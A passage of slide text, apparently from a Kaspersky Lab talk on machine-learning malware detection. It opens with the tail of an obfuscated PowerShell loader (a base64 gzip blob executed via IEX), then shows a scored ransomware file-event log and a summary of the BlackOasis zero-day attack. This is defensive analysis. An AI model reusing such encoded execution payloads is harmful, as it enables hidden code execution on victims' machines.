SzQsJ8kDsUN4qMR0o5rwWDslkOsguv4CzyPNjUlNSCjZOUEKkdRIkVcbAUQIXBSU4T6rfxnFy URSIpAjlwWGLGlqK+4SmfCmzxpe7YKDo8qVAszWn60BOlAAxahR4ohmjVkNPIqCN/VBXsNwcy sGjAJ+i3o4MUZ8YC61nXxNdS/S5grsT19Uwrzkw308UZ5hw4c143LnW5Y4QyZm7EbRYUzrifs SLgtXBn4xrcTIBPSx1R3eZJtii58ycubTThu5MA0NS19Ec+Bc11xK5BeeInCp1ddFVMCc4+qg zavALrX5JRPyoa7rQmT7Ze7KjNBqdWTYW+r1rwVUHtsqfqwf9LdVfbNtdWTnMLTofzWMFK2BH Uecjw0VTIxSniroYGaHm/LFzRka33lBdEdY1nHVDvQ4fzwMPyVhfNy/MaTNcewYHHE11zXd1a yONO5Yn1uvGhO9rGKnj6ZbLdgqX7Y0+6AQtw/d8SqswrBst8TDKBvIk7d0Ju+6dkvVxI+vfbY XpFl/vJn5n141BSuz3LDKenAfyhPNaRsPbZJQqQa7zyJnQUff8liw8lV93Rul81t8h6XO7xxG vD3xii+JQ55SvCYcbgnzjuAfT4ghwXmeX3cjQG5/qnw2QXdxL5LOGN+p9hw91UxMgDcRrjMR7 EbjR1yF/G7bahQ/gdzbhQ8CXY+QAM+ba7c5DnZ/PBFvva9llW1N2ggC6yqU8c550h/WhLXSji Pr5IPEBWdd5o78wt6Kpz/3bHdJGwCmYp3notaY3t+PmKPd7gsdHjm2KVcN2CH4IAs0k0G0C11 B5Pn7GOVQ0DfDcND28szXBGqi7zkyfqnfyB1pWUFclF12elMhrHbFnRrFrEigd6HHFVaYGkZq 3rWGAqQbLnjxjtijyEYH2Dw+E4jIQCAks2kJP2xx08WNvXcHVNoHhxfmLowrzJFh5bq3F0tXV AiDTtnpS/bUu8p3ErXLZBcdBp+SyBgeev91dKQj37A9HVmnHpbT92xQ5mKrQm6iEB/Z0+H/wm l+DLvzZb+T1ee0Xu2/imqseePhp9ceF/8T3b9IwNXEC8jrc5QQd3xm/ZCNPqJMH2iFikCeb/K Pv5UGafOzDw+0fYnWge6ULAAA=‘ ));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress ))).ReadToEnd();",0xF7722B62B4014E0C50ADFA9D60CAFA1C)
  • 44.
    Case #3: Cryptor Score| Event ------------------------------------------------- -2.352 | FileAccessed("$programfiles7-zip7zcon.sfx", | 00000010110000000010000100100001) -2.343 | FileModified("$programfiles7-zip7zcon.sfx") -2.335 | FileRenamed("$programfiles7-zip7zcon.sfx", | "$programfiles7-zip7zcon.sfx.xoxoxo") -1.296 | FileCreated("$programfiles7-ziphistory.txt", | [484953544F5259206F66]) -0.996 | FileAccessed("$programfiles7-ziphistory.txt", | 00000010110000000010000100100001) -0.670 | FileModified("$programfiles7-ziphistory.txt") -0.667 | FileCreated("$programfiles7-ziphistory.txt", | [CE22AD093C70CD1A5ABC]) -0.653 | FileRenamed("$programfiles7-ziphistory.txt", | “$programfiles7-ziphistory.txt.xoxoxo") | ... | ... | 1.967 | FileAccessed("c:python27license.txt", | 00000010110000000010000100100001) 3.055 | FileModified("c:python27license.txt") 3.055 | CreateFile("c:python27license.txt", | [E8FF9047336A051EB2E7]) 3.646 | RenameFile("c:python27license.txt", | "c:python27license.txt.xoxoxo") ... | ...
  • 45.
    Case #4: MLdetector against zero day threat:  In October 2017 we have spotted BlackOasis activity. In this attack flash zero day exploit was used - https://securelist.com/blackoasis-apt-and-new-targeted- attacks-leveraging-zero-day-exploit/82732/  After successful execution of vulnerability payload is executed  In this attack a special technique for payload execution was used: • Special service was created • Main malware modules were dropped to %programdata% • Modules included a legitimate utility adaptertroubleshooter.exe • This utility was used to load main malware module via DLL hijacking
  • 46.
    LET’S TALK? Kaspersky LabHQ 39A/3 Leningradskoe Shosse Moscow, 125212, Russian Federation Tel: +7 (495) 797-8700 www.kaspersky.com 49